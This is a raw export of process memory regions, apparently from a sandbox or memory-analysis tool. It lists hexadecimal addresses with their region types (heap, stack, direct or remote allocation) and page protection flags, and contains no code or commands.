page read and write
2085E26A000
heap
page read and write
29F5802F000
heap
page read and write
185BBED3000
heap
page read and write
185BD7C0000
direct allocation
page read and write
7FF8F846B000
unkown
page readonly
185BC772000
heap
page read and write
2B648530000
heap
page read and write
7FF8F8300000
unkown
page readonly
7FF8FF575000
unkown
page read and write
2BE0CC1E000
heap
page read and write
20D49140000
heap
page read and write
2085E6AF000
heap
page read and write
2085DC5D000
heap
page read and write
2085E66E000
heap
page read and write
185BB3F9000
heap
page read and write
185BBC24000
heap
page read and write
25EFD905000
heap
page read and write
185BBD28000
heap
page read and write
2085E24C000
heap
page read and write
7FF7C3CE1000
unkown
page execute read
2085E0D3000
heap
page read and write
2085DBE1000
heap
page read and write
7FF8E7FA8000
unkown
page readonly
185BBB97000
heap
page read and write
7FF8E60AA000
unkown
page write copy
7FF8F85B1000
unkown
page read and write
7FF8FF587000
unkown
page readonly
185BB7C6000
heap
page read and write
2085E4DA000
heap
page read and write
7FF8E8011000
unkown
page execute read
2085E735000
heap
page read and write
185BD59F000
heap
page read and write
7FF8E6609000
unkown
page read and write
185BB33F000
heap
page read and write
2085C2B5000
heap
page read and write
2085C2B5000
heap
page read and write
C9F52FE000
stack
page read and write
2085E575000
heap
page read and write
2085E598000
heap
page read and write
7FF8FF5F3000
unkown
page readonly
28CCB3CD000
heap
page read and write
185BB7C9000
heap
page read and write
185BBD86000
heap
page read and write
7FF8FF580000
unkown
page readonly
2085E47D000
heap
page read and write
28CCB2E0000
heap
page read and write
7FF8F8751000
unkown
page readonly
185BBE45000
heap
page read and write
185BB3E8000
heap
page read and write
1ED9B277000
heap
page read and write
25EFD905000
heap
page read and write
2085E11D000
heap
page read and write
7FF8E7D4B000
unkown
page write copy
2085DCAC000
heap
page read and write
7FF8E727D000
unkown
page read and write
20860120000
direct allocation
page read and write
185BC8B7000
heap
page read and write
2085E11D000
heap
page read and write
2085F0B2000
heap
page read and write
7FF8F8593000
unkown
page readonly
2085DC56000
heap
page read and write
2085DCB2000
heap
page read and write
2085E0A5000
heap
page read and write
2085F164000
heap
page read and write
DA73AFF000
stack
page read and write
2085E098000
heap
page read and write
61617FF000
unkown
page read and write
185BBBE3000
heap
page read and write
185BBF09000
heap
page read and write
2085E24E000
heap
page read and write
185BC772000
heap
page read and write
2085E515000
heap
page read and write
2085DC6C000
heap
page read and write
185BB832000
heap
page read and write
2085E0C4000
heap
page read and write
185BB7B3000
heap
page read and write
7FF8F8745000
unkown
page readonly
7FF8F85E4000
unkown
page read and write
7FF8E6438000
unkown
page readonly
185BBCB7000
heap
page read and write
185BBD28000
heap
page read and write
25EFD905000
heap
page read and write
185BD7D0000
direct allocation
page read and write
7FF8E6701000
unkown
page read and write
2085F060000
heap
page read and write
2085E0AE000
heap
page read and write
2085E21F000
heap
page read and write
2085E51B000
heap
page read and write
7FF8F8306000
unkown
page readonly
25EFD905000
heap
page read and write
2085DC70000
heap
page read and write
2085E228000
heap
page read and write
2234A880000
heap
page read and write
21D976D1000
heap
page read and write
185BB778000
heap
page read and write
FD19CFE000
stack
page read and write
25EFD906000
heap
page read and write
279B8FF0000
heap
page read and write
185B9850000
heap
page read and write
2085E156000
heap
page read and write
26027D2A000
heap
page read and write
2085F23A000
heap
page read and write
2085F149000
heap
page read and write
25EFD90A000
heap
page read and write
185BC776000
heap
page read and write
185BB358000
heap
page read and write
25EFD905000
heap
page read and write
185B9838000
heap
page read and write
185BBDA5000
heap
page read and write
512E9FF000
unkown
page read and write
18FDF26A000
heap
page read and write
185BBDC1000
heap
page read and write
29F58052000
heap
page read and write
185BBF11000
heap
page read and write
2085F1BF000
heap
page read and write
185BB3B2000
heap
page read and write
185BC873000
heap
page read and write
2085F1A2000
heap
page read and write
185B9780000
heap
page read and write
185BB671000
heap
page read and write
185BD7F0000
direct allocation
page read and write
185B9853000
heap
page read and write
2085E5A6000
heap
page read and write
185BC79E000
heap
page read and write
185BB6C1000
heap
page read and write
2085DC91000
heap
page read and write
7FF8FF586000
unkown
page read and write
20860120000
direct allocation
page read and write
1F496510000
heap
page read and write
18FDF277000
heap
page read and write
2085E6BC000
heap
page read and write
2085FA60000
direct allocation
page read and write
2085DC87000
heap
page read and write
7FF8E7282000
unkown
page readonly
2085E697000
heap
page read and write
7FF8E6101000
unkown
page execute read
25EFD90C000
heap
page read and write
185BC828000
heap
page read and write
2085F16B000
heap
page read and write
2085F15E000
heap
page read and write
75434FF000
stack
page read and write
2085E249000
heap
page read and write
185BD59F000
heap
page read and write
185BB341000
heap
page read and write
185BB70B000
heap
page read and write
7FF8E7FF0000
unkown
page readonly
2085E683000
heap
page read and write
2085E246000
heap
page read and write
2085E6BA000
heap
page read and write
2085E4CA000
heap
page read and write
25EFD905000
heap
page read and write
185BB310000
heap
page read and write
2085E0B4000
heap
page read and write
185BBD50000
heap
page read and write
2085E7B0000
heap
page read and write
7FF8E6FC5000
unkown
page readonly
7FF8E8030000
unkown
page readonly
2234A900000
heap
page read and write
185BB6CB000
heap
page read and write
2085E1F7000
heap
page read and write
2085E4E1000
heap
page read and write
25EFD905000
heap
page read and write
24A03BA1000
heap
page read and write
7FF8FF5A1000
unkown
page read and write
2085E1B2000
heap
page read and write
2085E4AA000
heap
page read and write
2085F2DC000
heap
page read and write
185BCAE8000
heap
page read and write
185BB3E1000
heap
page read and write
25EFD905000
heap
page read and write
185B983F000
heap
page read and write
185BB76E000
heap
page read and write
20860100000
direct allocation
page read and write
185BBF48000
heap
page read and write
2085E637000
heap
page read and write
296125F8000
heap
page read and write
2085C28F000
heap
page read and write
2085C25A000
heap
page read and write
185BBECE000
heap
page read and write
25EFD905000
heap
page read and write
25EFD905000
heap
page read and write
7FF8E7D49000
unkown
page write copy
185BBBF1000
heap
page read and write
185BB6C9000
heap
page read and write
2085E0C3000
heap
page read and write
185BB84C000
heap
page read and write
2085DCCA000
heap
page read and write
22F6FEB1000
heap
page read and write
2085DCA3000
heap
page read and write
25EFD912000
heap
page read and write
1F32FE3F000
heap
page read and write
75432FC000
stack
page read and write
7FF67A62B000
unkown
page readonly
25EE4AEA000
heap
page read and write
185BB6D5000
heap
page read and write
7FF8F6FA1000
unkown
page execute read
D9011DF000
stack
page read and write
20860120000
direct allocation
page read and write
7FF8F7EC1000
unkown
page execute read
2085E1DB000
heap
page read and write
185BCA14000
heap
page read and write
185BBF36000
heap
page read and write
185BB33B000
heap
page read and write
185BBED6000
heap
page read and write
185BC815000
heap
page read and write
185BB3ED000
heap
page read and write
2085E13C000
heap
page read and write
7FF8F8BC0000
unkown
page readonly
2085E0CC000
heap
page read and write
1F32FE28000
heap
page read and write
185BBDC1000
heap
page read and write
2085E53F000
heap
page read and write
185BB328000
heap
page read and write
2085C293000
heap
page read and write
185BC7B0000
heap
page read and write
2085E7B0000
heap
page read and write
2085E515000
heap
page read and write
25EFD905000
heap
page read and write
185BCAD3000
heap
page read and write
185BBC01000
heap
page read and write
18FDF270000
heap
page read and write
2530878E000
heap
page read and write
2085DC8E000
heap
page read and write
2085DC90000
heap
page read and write
185BBF04000
heap
page read and write
185BCAB0000
heap
page read and write
2085F1C9000
heap
page read and write
2085E484000
heap
page read and write
2085E24E000
heap
page read and write
185BD7D0000
direct allocation
page read and write
185BB7C8000
heap
page read and write
7FF8FF59D000
unkown
page readonly
7FF8F8BB1000
unkown
page execute read
185BBF48000
heap
page read and write
2085E162000
heap
page read and write
7FF67A601000
unkown
page execute read
2085F372000
heap
page read and write
185B9868000
heap
page read and write
7FF67A62B000
unkown
page readonly
279B8FFA000
heap
page read and write
185BB7EB000
heap
page read and write
D9011DA000
stack
page read and write
185BCAB2000
heap
page read and write
185BB6BE000
heap
page read and write
185BBC62000
heap
page read and write
2085E081000
heap
page read and write
7FF8FF5DE000
unkown
page readonly
2085F22B000
heap
page read and write
185BBE38000
heap
page read and write
185BC824000
heap
page read and write
2085DC01000
heap
page read and write
185BB41E000
heap
page read and write
2085E25B000
heap
page read and write
29F58019000
heap
page read and write
25EE4770000
heap
page read and write
7FF8F8D80000
unkown
page readonly
171C4346000
heap
page read and write
185BB6DB000
heap
page read and write
185BBE2C000
heap
page read and write
185BD7F0000
direct allocation
page read and write
185BD7D0000
direct allocation
page read and write
1F32FE63000
heap
page read and write
185BB7DB000
heap
page read and write
2085F22A000
heap
page read and write
1C5A7010000
heap
page read and write
185BBDBA000
heap
page read and write
7FF8E7327000
unkown
page execute read
7FF8F8421000
unkown
page execute read
25EFD912000
heap
page read and write
185BD7C0000
direct allocation
page read and write
2085FC3C000
direct allocation
page read and write
7FF8F8560000
unkown
page readonly
2085E496000
heap
page read and write
185BB3CD000
heap
page read and write
7FF8E6F03000
unkown
page readonly
185BB77A000
heap
page read and write
7FF8E8035000
unkown
page readonly
2085E094000
heap
page read and write
185BB398000
heap
page read and write
185BBEB4000
heap
page read and write
185BC7B9000
heap
page read and write
281E0100000
heap
page read and write
2085E1D2000
heap
page read and write
2085F0D9000
heap
page read and write
25EFD90C000
heap
page read and write
185BBB86000
heap
page read and write
7FF8E76DA000
unkown
page readonly
2085E0C4000
heap
page read and write
185BB824000
heap
page read and write
7FF8F8391000
unkown
page execute read
185BB679000
heap
page read and write
185BBF31000
heap
page read and write
7FF8E5B42000
unkown
page readonly
2085DCD6000
heap
page read and write
185BB3E9000
heap
page read and write
185BBCB1000
heap
page read and write
2085E5A1000
heap
page read and write
7FF8E7609000
unkown
page execute read
2085F106000
heap
page read and write
2085E58C000
heap
page read and write
185BBED7000
heap
page read and write
185BBCBA000
heap
page read and write
18FDF274000
heap
page read and write
185BBE6B000
heap
page read and write
18A3D945000
heap
page read and write
25EFD905000
heap
page read and write
7FF8F6FA1000
unkown
page execute read
18FDF267000
heap
page read and write
7FF8E5C12000
unkown
page execute read
185BB75C000
heap
page read and write
185BCAD0000
heap
page read and write
1F32FE73000
heap
page read and write
7FF8E77A0000
unkown
page readonly
185BB3DB000
heap
page read and write
2085E5D1000
heap
page read and write
20860130000
direct allocation
page read and write
185BB3A1000
heap
page read and write
185BBF48000
heap
page read and write
185BBB60000
heap
page read and write
2085E637000
heap
page read and write
2085F0A5000
heap
page read and write
185BBB88000
heap
page read and write
2085E5B2000
heap
page read and write
25EFD911000
heap
page read and write
2085E580000
heap
page read and write
185BC8B9000
heap
page read and write
25EFD8E8000
heap
page read and write
2085DB4C000
direct allocation
page read and write
185BB7C8000
heap
page read and write
25EFD905000
heap
page read and write
7FF8E6F51000
unkown
page execute read
185BB3CC000
heap
page read and write
185BB83D000
heap
page read and write
185BB6D7000
heap
page read and write
1F32FEA1000
heap
page read and write
185BBE99000
heap
page read and write
185BB832000
heap
page read and write
20860100000
direct allocation
page read and write
185BC981000
heap
page read and write
1C5A6F1B000
heap
page read and write
2085F0E3000
heap
page read and write
2085C1D0000
heap
page read and write
7FF8E6EF1000
unkown
page execute read
185B987A000
heap
page read and write
18FDF26D000
heap
page read and write
2085DCDD000
heap
page read and write
25EFD905000
heap
page read and write
185BB39D000
heap
page read and write
FD19BFE000
stack
page read and write
7FF8F8595000
unkown
page read and write
7FF8E715F000
unkown
page readonly
185BCAEB000
heap
page read and write
185BBE6E000
heap
page read and write
7FF8E6734000
unkown
page write copy
185BBEFF000
heap
page read and write
24A03AF0000
heap
page read and write
2085E745000
heap
page read and write
7FF8E8031000
unkown
page execute read
185BB3A5000
heap
page read and write
21D97690000
remote allocation
page read and write
18FDF275000
heap
page read and write
185BBDC5000
heap
page read and write
185BBD9C000
heap
page read and write
185BBD50000
heap
page read and write
7FF8F853D000
unkown
page read and write
18A3D970000
heap
page read and write
185BB7CD000
heap
page read and write
185BB3D5000
heap
page read and write
18B7EC38000
heap
page read and write
2085E091000
heap
page read and write
2085E1D3000
heap
page read and write
185BB7E6000
heap
page read and write
7FF8E60DF000
unkown
page readonly
25EFD90C000
heap
page read and write
20860150000
direct allocation
page read and write
185BBDAA000
heap
page read and write
7FF8E69DC000
unkown
page readonly
185BD7D0000
direct allocation
page read and write
7FF8F3F31000
unkown
page execute read
185BB832000
heap
page read and write
185BB341000
heap
page read and write
185BBCB0000
heap
page read and write
21D97707000
heap
page read and write
7FF8E6F90000
unkown
page readonly
7FF8F85A9000
unkown
page readonly
185BB75A000
heap
page read and write
25EE481B000
heap
page read and write
2085F1AD000
heap
page read and write
20860120000
direct allocation
page read and write
7CAC8FC000
stack
page read and write
21D976F4000
heap
page read and write
25EFD905000
heap
page read and write
25EFD905000
heap
page read and write
185BD7E0000
direct allocation
page read and write
2BE0CBE0000
heap
page read and write
185BBD9E000
heap
page read and write
185BC87B000
heap
page read and write
20860160000
direct allocation
page read and write
2085E1F7000
heap
page read and write
2085DAA0000
heap
page read and write
185BB7DA000
heap
page read and write
24541820000
heap
page read and write
2085DC7D000
heap
page read and write
7FF7C3CE0000
unkown
page readonly
185BBE2E000
heap
page read and write
2085E798000
heap
page read and write
EDED8FC000
stack
page read and write
185BB75C000
heap
page read and write
185BB85E000
heap
page read and write
2085E5A8000
heap
page read and write
2085F383000
heap
page read and write
7FF8E717C000
unkown
page read and write
279B8FE0000
heap
page read and write
2085DBE5000
heap
page read and write
2085E53E000
heap
page read and write
7FF67A600000
unkown
page readonly
185BB844000
heap
page read and write
185BB35B000
heap
page read and write
185BBDC6000
heap
page read and write
18C8AD75000
heap
page read and write
185BBBF8000
heap
page read and write
7FF8E6F95000
unkown
page read and write
185BBF40000
heap
page read and write
2085F1D8000
heap
page read and write
2085F0E8000
heap
page read and write
2085DC1A000
heap
page read and write
25308779000
heap
page read and write
75433FF000
unkown
page read and write
2085FC28000
direct allocation
page read and write
2085E0EC000
heap
page read and write
185BCAC1000
heap
page read and write
18FDF274000
heap
page read and write
185BBC01000
heap
page read and write
EDED9FF000
unkown
page read and write
185BBBC7000
heap
page read and write
29612633000
heap
page read and write
185BB6E9000
heap
page read and write
2085E4CF000
heap
page read and write
7FF8F8400000
unkown
page readonly
185B9864000
heap
page read and write
20860130000
direct allocation
page read and write
2085E26B000
heap
page read and write
2085DCC8000
heap
page read and write
2085E71D000
heap
page read and write
1F32FEBA000
heap
page read and write
7FF8E6FF5000
unkown
page readonly
62487FE000
unkown
page read and write
2085C28F000
heap
page read and write
2085E090000
heap
page read and write
2085E204000
heap
page read and write
20D49170000
heap
page read and write
20860110000
direct allocation
page read and write
185BB33C000
heap
page read and write
7FF8E6679000
unkown
page write copy
25EFD905000
heap
page read and write
7FF8E6738000
unkown
page read and write
7FF8F7A90000
unkown
page readonly
20860180000
direct allocation
page read and write
185BC796000
heap
page read and write
28CCB5E5000
heap
page read and write
185BC766000
heap
page read and write
7FF8F8304000
unkown
page read and write
21D976B0000
heap
page read and write
138D1D5000
stack
page read and write
7FF8E6FB4000
unkown
page readonly
185BBB6A000
heap
page read and write
185BB3E7000
heap
page read and write
1F496410000
heap
page read and write
25EFD905000
heap
page read and write
2085E470000
heap
page read and write
185BB3CE000
heap
page read and write
185B9818000
heap
page read and write
2085F083000
heap
page read and write
185BB358000
heap
page read and write
2085E165000
heap
page read and write
2085F370000
heap
page read and write
2085E6D7000
heap
page read and write
2085F11B000
heap
page read and write
2085E18E000
heap
page read and write
2085E4A9000
heap
page read and write
20860110000
direct allocation
page read and write
2085DBFD000
heap
page read and write
185BBC24000
heap
page read and write
2085E697000
heap
page read and write
2085DBE9000
heap
page read and write
2085E4DF000
heap
page read and write
2085E1AE000
heap
page read and write
25EFD913000
heap
page read and write
185BCAEA000
heap
page read and write
21D97735000
heap
page read and write
2085F14F000
heap
page read and write
2085E0EB000
heap
page read and write
7FF8FF5F8000
unkown
page read and write
185BCAD3000
heap
page read and write
2085E4A2000
heap
page read and write
28CCB3CD000
heap
page read and write
185BB341000
heap
page read and write
7FF8E72C2000
unkown
page execute read
2085E637000
heap
page read and write
21D976CE000
heap
page read and write
185BC828000
heap
page read and write
185BB767000
heap
page read and write
7FF8F9186000
unkown
page readonly
25EFD905000
heap
page read and write
2085E11B000
heap
page read and write
18B7EB10000
heap
page read and write
18B7EC10000
heap
page read and write
2085E5A1000
heap
page read and write
2085DC60000
heap
page read and write
185BBC38000
heap
page read and write
2085DCA1000
heap
page read and write
2085E574000
heap
page read and write
185BB36F000
heap
page read and write
185BB6FC000
heap
page read and write
185BB665000
heap
page read and write
18FDF278000
heap
page read and write
210405D1000
heap
page read and write
2085E1B8000
heap
page read and write
185BBD4B000
heap
page read and write
7FF8E715B000
unkown
page read and write
2085E6C6000
heap
page read and write
185BC7AB000
heap
page read and write
171C43B2000
heap
page read and write
7FF8F7EC3000
unkown
page readonly
185BB70C000
heap
page read and write
18FDF271000
heap
page read and write
2085E637000
heap
page read and write
2085E162000
heap
page read and write
2085E730000
heap
page read and write
7FF8E6EF4000
unkown
page readonly
7FF7C3D22000
unkown
page readonly
7FF8E6FE1000
unkown
page execute read
2085E25A000
heap
page read and write
185BBCB5000
heap
page read and write
2085DCD3000
heap
page read and write
25EFD911000
heap
page read and write
185BC270000
direct allocation
page read and write
18FDF26A000
heap
page read and write
185BBDFC000
heap
page read and write
185BBD42000
heap
page read and write
185BB859000
heap
page read and write
185BBC27000
heap
page read and write
2085E484000
heap
page read and write
185B9818000
heap
page read and write
185B980C000
heap
page read and write
7FF8E7E04000
unkown
page write copy
7FF8E774D000
unkown
page read and write
185BB71C000
heap
page read and write
20860130000
direct allocation
page read and write
7FF8E6F81000
unkown
page execute read
2085F1F3000
heap
page read and write
185BBBA1000
heap
page read and write
7FF8FF5B1000
unkown
page execute read
18FDF265000
heap
page read and write
171C4374000
heap
page read and write
210405BB000
heap
page read and write
185BB7C3000
heap
page read and write
185BB3C5000
heap
page read and write
185BBD72000
heap
page read and write
25EE47EF000
heap
page read and write
7FF8E6F73000
unkown
page readonly
7FF8E7020000
unkown
page readonly
1C5A7135000
heap
page read and write
7FF8F3F30000
unkown
page readonly
185BBD7B000
heap
page read and write
2085E6C9000
heap
page read and write
2085F40D000
heap
page read and write
2085E180000
heap
page read and write
1F32FE3F000
heap
page read and write
25EFD911000
heap
page read and write
18FDF1C0000
heap
page readonly
2085E16B000
heap
page read and write
1C5A6F10000
heap
page read and write
7FF8F83DF000
unkown
page readonly
20D49200000
heap
page read and write
18B7EBF0000
heap
page read and write
185BB36A000
heap
page read and write
2085E091000
heap
page read and write
24F21CCE000
heap
page read and write
185BCA14000
heap
page read and write
185BBD8F000
heap
page read and write
185BCAD0000
heap
page read and write
2085E515000
heap
page read and write
185BC766000
heap
page read and write
2085E181000
heap
page read and write
25EFD912000
heap
page read and write
185BCAB0000
heap
page read and write
20860130000
direct allocation
page read and write
2085E784000
heap
page read and write
185BCAD0000
heap
page read and write
18FDF271000
heap
page read and write
1ED9B27B000
heap
page read and write
7FF8F8373000
unkown
page readonly
2085DCDD000
heap
page read and write
185BB3B4000
heap
page read and write
21D979D0000
heap
page read and write
2085DC58000
heap
page read and write
185BBBE6000
heap
page read and write
25EE4822000
heap
page read and write
185BBBB3000
heap
page read and write
25EFD905000
heap
page read and write
4EABBDE000
stack
page read and write
185BBC29000
heap
page read and write
7FF8F7A93000
unkown
page readonly
185BB72D000
heap
page read and write
2085FBAC000
direct allocation
page read and write
2085DC02000
heap
page read and write
185BD310000
direct allocation
page read and write
21D976F4000
heap
page read and write
2085DC36000
heap
page read and write
20860130000
direct allocation
page read and write
AA5D4FF000
stack
page read and write
2085DBFC000
heap
page read and write
185BBBF2000
heap
page read and write
185BBEB0000
heap
page read and write
2085E0D3000
heap
page read and write
2085E165000
heap
page read and write
28CCB3C1000
heap
page read and write
185BB3B6000
heap
page read and write
7FF8E60AD000
unkown
page read and write
25EFD90A000
heap
page read and write
2085E0BC000
heap
page read and write
24A03DA0000
heap
page read and write
20860130000
direct allocation
page read and write
7FF8FF591000
unkown
page execute read
185BC7C5000
heap
page read and write
7FF8E5AE1000
unkown
page execute read
2085F1EB000
heap
page read and write
171C4381000
heap
page read and write
24F21D49000
heap
page read and write
20860130000
direct allocation
page read and write
185BB3B5000
heap
page read and write
185BBDAA000
heap
page read and write
185BBBDD000
heap
page read and write
2085E0A7000
heap
page read and write
185BB83A000
heap
page read and write
2085E515000
heap
page read and write
185BBDE8000
heap
page read and write
7FF8F8589000
unkown
page readonly
171C4344000
heap
page read and write
185BD12C000
direct allocation
page read and write
18FDF267000
heap
page read and write
7FF8E6786000
unkown
page read and write
1F32FE3D000
heap
page read and write
25EFD902000
heap
page read and write
185BB6D7000
heap
page read and write
2085E21F000
heap
page read and write
2085DC02000
heap
page read and write
2B648500000
heap
page read and write
171C4373000
heap
page read and write
2085E48D000
heap
page read and write
2085E590000
heap
page read and write
185BBD6B000
heap
page read and write
7FF8E7253000
unkown
page execute read
185BBBF2000
heap
page read and write
25EFD913000
heap
page read and write
185BBBA1000
heap
page read and write
185BB36B000
heap
page read and write
185BBE33000
heap
page read and write
24541908000
heap
page read and write
185BC78B000
heap
page read and write
185BD7D0000
direct allocation
page read and write
18FDF278000
heap
page read and write
185BBF36000
heap
page read and write
2085C2C1000
heap
page read and write
185BC8AF000
heap
page read and write
185BD800000
direct allocation
page read and write
185BB39C000
heap
page read and write
7FF8E6744000
unkown
page write copy
185BBCC3000
heap
page read and write
185BB825000
heap
page read and write
29F58038000
heap
page read and write
2085E5A1000
heap
page read and write
2085E674000
heap
page read and write
18FDF271000
heap
page read and write
185BBD4C000
heap
page read and write
185BB7E8000
heap
page read and write
7FF8E5B97000
unkown
page readonly
7FF8E7082000
unkown
page readonly
18C8AD80000
heap
page read and write
185BCAD3000
heap
page read and write
185BB3D2000
heap
page read and write
185BB6C9000
heap
page read and write
7FF8E7132000
unkown
page read and write
185BC7A1000
heap
page read and write
2085E4D4000
heap
page read and write
7FF8F8491000
unkown
page execute read
185BD7D0000
direct allocation
page read and write
185BB831000
heap
page read and write
2085F0E7000
heap
page read and write
7FF8F8BC3000
unkown
page readonly
2085E1D2000
heap
page read and write
2085E1A3000
heap
page read and write
185BB69E000
heap
page read and write
25EFD913000
heap
page read and write
185BBCA5000
heap
page read and write
2085DC56000
heap
page read and write
2085C2AA000
heap
page read and write
185BB3A9000
heap
page read and write
185B985F000
heap
page read and write
24F21CC8000
heap
page read and write
185BB728000
heap
page read and write
2085E52D000
heap
page read and write
7FF8F8D87000
unkown
page readonly
7FF8E6F63000
unkown
page readonly
34012FC000
stack
page read and write
185BB7AE000
heap
page read and write
20860130000
direct allocation
page read and write
2085C2A2000
heap
page read and write
2085E70B000
heap
page read and write
2085E6FA000
heap
page read and write
2085E11B000
heap
page read and write
185BB339000
heap
page read and write
2085DC1B000
heap
page read and write
2085F35E000
heap
page read and write
7FF8F8380000
unkown
page readonly
2085E081000
heap
page read and write
185BB7B8000
heap
page read and write
185BBBB7000
heap
page read and write
20860120000
direct allocation
page read and write
2085E0A7000
heap
page read and write
185BC84D000
heap
page read and write
18FDF220000
heap
page read and write
185BBBF8000
heap
page read and write
185BB3DF000
heap
page read and write
7FF8E7FAF000
unkown
page readonly
2085E664000
heap
page read and write
185BBB98000
heap
page read and write
171C4398000
heap
page read and write
2085E667000
heap
page read and write
2085E4E8000
heap
page read and write
185BB694000
heap
page read and write
2085F159000
heap
page read and write
185BBD84000
heap
page read and write
185BB3DF000
heap
page read and write
2085E56B000
heap
page read and write
2085F079000
heap
page read and write
21D97690000
remote allocation
page read and write
2085E246000
heap
page read and write
185BD7D0000
direct allocation
page read and write
18FDF26A000
heap
page read and write
185BD950000
direct allocation
page read and write
185BD93C000
direct allocation
page read and write
7FF8F8385000
unkown
page readonly
185BBE9C000
heap
page read and write
171C4280000
remote allocation
page read and write
22F70190000
heap
page read and write
2085E529000
heap
page read and write
2B648520000
heap
page read and write
28CCB3CD000
heap
page read and write
7FF8F7A01000
unkown
page execute read
2085DCD6000
heap
page read and write
2085E6E4000
heap
page read and write
185BB377000
heap
page read and write
185BD300000
direct allocation
page read and write
20860250000
direct allocation
page read and write
185BD488000
heap
page read and write
2085FBA0000
direct allocation
page read and write
7FF8E6F43000
unkown
page readonly
185BB6C0000
heap
page read and write
2085E515000
heap
page read and write
7FF8F8548000
unkown
page readonly
2085E517000
heap
page read and write
25EFD913000
heap
page read and write
26027CF0000
heap
page read and write
18FDF271000
heap
page read and write
25EE480F000
heap
page read and write
1F32FE87000
heap
page read and write
25EFD911000
heap
page read and write
2085F372000
heap
page read and write
185BBB68000
heap
page read and write
7FF8E5B92000
unkown
page readonly
185BB36A000
heap
page read and write
185BB7AA000
heap
page read and write
21D97650000
heap
page read and write
185BCAB8000
heap
page read and write
20860140000
direct allocation
page read and write
25EFD890000
heap
page read and write
2085E507000
heap
page read and write
185BBB95000
heap
page read and write
7FF8E8034000
unkown
page readonly
7FF8F6FA4000
unkown
page readonly
7FF8E5C01000
unkown
page execute read
7FF8F8750000
unkown
page readonly
185BBB89000
heap
page read and write
7FF8F8756000
unkown
page read and write
2085F14F000
heap
page read and write
18C8AD70000
heap
page read and write
2085E6E2000
heap
page read and write
185BB3D9000
heap
page read and write
7FF8E700F000
unkown
page readonly
185BBC24000
heap
page read and write
1F32FE3E000
heap
page read and write
185BB845000
heap
page read and write
7FF8F9181000
unkown
page execute read
C9F53FF000
stack
page read and write
185BB7AA000
heap
page read and write
2085E16B000
heap
page read and write
2085E0F4000
heap
page read and write
7FF8FF581000
unkown
page execute read
20860100000
direct allocation
page read and write
2085DC36000
heap
page read and write
185BBC1A000
heap
page read and write
2085E0D3000
heap
page read and write
25EFD90C000
heap
page read and write
185BB358000
heap
page read and write
7FF8E7171000
unkown
page execute read
24A03B8A000
heap
page read and write
24F21CCF000
heap
page read and write
1F32FCC0000
heap
page read and write
2085E079000
heap
page read and write
2085E4CB000
heap
page read and write
185BC7B5000
heap
page read and write
185BB3B2000
heap
page read and write
25EFD911000
heap
page read and write
2085E08E000
heap
page read and write
185BB3A5000
heap
page read and write
18FDF267000
heap
page read and write
185BD7C0000
direct allocation
page read and write
185BC845000
heap
page read and write
BBB77FF000
stack
page read and write
29F57FB0000
remote allocation
page read and write
185BBE23000
heap
page read and write
2085E4F6000
heap
page read and write
185BD7D0000
direct allocation
page read and write
7FF8E6FA0000
unkown
page readonly
25EFD905000
heap
page read and write
2085E170000
heap
page read and write
185BCAC4000
heap
page read and write
2085E499000
heap
page read and write
2085DC68000
heap
page read and write
185BBD8A000
heap
page read and write
2085F0B9000
heap
page read and write
7FF8F8394000
unkown
page readonly
1F496850000
heap
page read and write
2085E667000
heap
page read and write
1ED9B210000
heap
page read and write
7FF7C3CE1000
unkown
page execute read
2085DBEE000
heap
page read and write
7FF67A601000
unkown
page execute read
1C5A7160000
heap
page read and write
2085F0A4000
heap
page read and write
7FF8E6078000
unkown
page readonly
185BB3DD000
heap
page read and write
E8993AD000
stack
page read and write
1ED9B270000
heap
page read and write
2085F159000
heap
page read and write
1F32FDE0000
remote allocation
page read and write
185BB73F000
heap
page read and write
2085E188000
heap
page read and write
185BB364000
heap
page read and write
185BB669000
heap
page read and write
185BB7DE000
heap
page read and write
20D4921F000
heap
page read and write
2085DC93000
heap
page read and write
18A3D640000
heap
page read and write
7FF8E7DCD000
unkown
page read and write
7FF8E6FF1000
unkown
page execute read
2085E190000
heap
page read and write
185BB83C000
heap
page read and write
185BB7F5000
heap
page read and write
185B985F000
heap
page read and write
185BB7D1000
heap
page read and write
18C8ADD0000
heap
page read and write
2085DC03000
heap
page read and write
185BB75A000
heap
page read and write
185BC756000
heap
page read and write
21D821D0000
heap
page read and write
2085E0FC000
heap
page read and write
25EFD90C000
heap
page read and write
2085DC56000
heap
page read and write
25EFD905000
heap
page read and write
185B9846000
heap
page read and write
7FF8E7718000
unkown
page readonly
2085E471000
heap
page read and write
7FF8F7EC4000
unkown
page readonly
7FF8E6736000
unkown
page write copy
185BB751000
heap
page read and write
7FF8F8303000
unkown
page readonly
2085E0AD000
heap
page read and write
185BBE22000
heap
page read and write
2085DCD4000
heap
page read and write
2085E6AB000
heap
page read and write
2085E114000
heap
page read and write
185BD7F0000
direct allocation
page read and write
2085DCD3000
heap
page read and write
2085E4A9000
heap
page read and write
2085E481000
heap
page read and write
20860120000
direct allocation
page read and write
61485FF000
stack
page read and write
7FF8F8BC1000
unkown
page execute read
2085F1EE000
heap
page read and write
185BBCB5000
heap
page read and write
2085F10B000
heap
page read and write
25EFD911000
heap
page read and write
7FF8E7177000
unkown
page readonly
2085E094000
heap
page read and write
171C437E000
heap
page read and write
2085E206000
heap
page read and write
2085F07D000
heap
page read and write
296125A0000
heap
page read and write
2085E0D7000
heap
page read and write
7FF8F8301000
unkown
page execute read
185BB3AC000
heap
page read and write
185BBED8000
heap
page read and write
7FF8E6FB0000
unkown
page readonly
2085E525000
heap
page read and write
7FF8E6FD1000
unkown
page execute read
25EFD905000
heap
page read and write
25EE481F000
heap
page read and write
29F58091000
heap
page read and write
2085E165000
heap
page read and write
24F21CCF000
heap
page read and write
185BC8B3000
heap
page read and write
185BBE3D000
heap
page read and write
20860120000
direct allocation
page read and write
7FF8F8390000
unkown
page readonly
24F21CB0000
heap
page read and write
185B9960000
heap
page readonly
185BB6FA000
heap
page read and write
185BBD28000
heap
page read and write
185BB75F000
heap
page read and write
18FDF26A000
heap
page read and write
18FDF26E000
heap
page read and write
20860120000
direct allocation
page read and write
2085E070000
heap
page read and write
2085E204000
heap
page read and write
26027D41000
heap
page read and write
2085DF50000
direct allocation
page read and write
2085C25B000
heap
page read and write
2085E638000
heap
page read and write
185BB6BF000
heap
page read and write
185BBC80000
heap
page read and write
25EE4811000
heap
page read and write
2085F0E9000
heap
page read and write
1C5A6E20000
heap
page read and write
171C4260000
heap
page read and write
2085E515000
heap
page read and write
185BBCA4000
heap
page read and write
185BBEFA000
heap
page read and write
29612606000
heap
page read and write
24F21D17000
heap
page read and write
7FF8F8BC5000
unkown
page readonly
29F58023000
heap
page read and write
